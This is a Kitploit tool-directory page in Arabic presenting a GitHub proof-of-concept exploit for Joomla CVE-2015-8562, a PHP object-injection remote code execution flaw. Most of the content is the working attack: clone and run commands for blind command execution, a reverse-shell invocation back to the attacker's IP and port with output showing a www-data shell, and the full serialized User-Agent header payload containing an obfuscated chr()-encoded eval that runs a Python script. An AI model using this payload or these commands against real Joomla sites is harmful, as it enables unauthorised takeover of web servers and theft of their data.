Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Joomla_CVE-2015-8562 — إثبات مفهوم لثغرة Joomla CVE-2015-8562 (Object Injection RCE) | Kitploit
أدوات/GitHubGitHub/voidsec/joomla_cve-2015-8562
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubvoidsec/joomla_cve-2015-8562

Joomla_CVE-2015-8562

إثبات مفهوم لثغرة Joomla CVE-2015-8562 (Object Injection RCE)

عرض المستودع
11869منذ 6 سنواتلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Joomla_CVE-2015-8562

إثبات مفهوم لثغرة Joomla CVE-2015-8562 (حقن كائنات وتنفيذ أوامر عن بعد)

مقدمة/سجل التغييرات

هذا الإثبات هو الإصدار الثاني من التنفيذ المستضاف على exploit-db.

root@kitploit:~
-إصلاح (إعادة إنشاء الجلسة)
-إضافة خيار التبديل من طريقة X-Forwarded-For إلى User-Agent
-إضافة خيار التبديل من شل عكسي بلغة Python إلى شل باش
-إضافة التقاط الاستثناء لعدم وجود مخطط http وإنهاء النص البرمجي
-تحرير لاستخدام أفضل ورسائل وألوان أفضل
-TODO: إضافة دعم msf

كيفية الاستخدام

root@kitploit:~
git clone https://github.com/VoidSec/Joomla_CVE-2015-8562.git
cd Joomla_CVE-2015-8562

تنفيذ أوامر أعمى:

root@kitploit:~
python joomla-cve-2015-8562.py -t http://<target_ip>/ --cmd
$ touch /tmp/test

إنشاء شل عكسي:

root@kitploit:~
python joomla-cve-2015-8562.py -t http://<target_ip>/ -l <local_ip> -p <local_port>
[-] محاولة استغلال ثغرة Joomla RCE (CVE-2015-8562) على: http://<target_ip>/
[-] جارٍ رفع شل عكسي بلغة Python
<Response [200]>
[+] إنشاء شل عكسي....
<Response [200]>
الاستماع على [0.0.0.0] (العائلة 0، المنفذ 1337)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

CVE-2015-8562

في ديسمبر 2015، تم اكتشاف ثغرة جديدة في Joomla. تسمح لمهاجم عن بعد باستغلال هجمات حقن كائنات PHP وتنفيذ كود PHP عشوائي عبر رأس HTTP User-Agent.

تستهدف هذه الثغرة Joomla من الإصدار 1.5.0 حتى 3.4.5 وإصدارات PHP قبل 5.4.45 (بما في ذلك 5.3.x)، و5.5.29 أو 5.6.13 CVE-2015-6835.

لقد قمت بكتابة منشور مدونة يشرح الثغرة.

هذا ما يبدو عليه الرأس المُرسل

root@kitploit:~
}__test|O:21:"JDatabaseDriverMysqli":3:{
	s:2:"fc";
	O:17:"JSimplepieFactory":0:{}
	s:21:"\0\0\0disconnectHandlers";
	a:1:{
		i:0;
		a:2:{
			i:0;
			O:9:"SimplePie":5:{
				s:8:"sanitize";
				O:20:"JDatabaseDriverMysql":0:{}
				s:8:"feed_url";
				s:305:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(112).chr(121).chr(116).chr(104).chr(111).chr(110).chr(32).chr(47).chr(116).chr(109).chr(112).chr(47).chr(76).chr(56).chr(51).chr(55).chr(66).chr(72).chr(46).chr(112).chr(121).chr(39).chr(41).chr(59));
				JFactory::getConfig();
				exit";
				s:19:"cache_name_function";
				s:6:"assert";
				s:5:"cache";
				b:1;s:11:"cache_class";
				O:20:"JDatabaseDriverMysql":0:{}
				}
			i:1;
			s:4:"init";
			}
		}
	s:13:"\0\0\0connection";
	b:1;
}ýýýý
تنزيل الأداة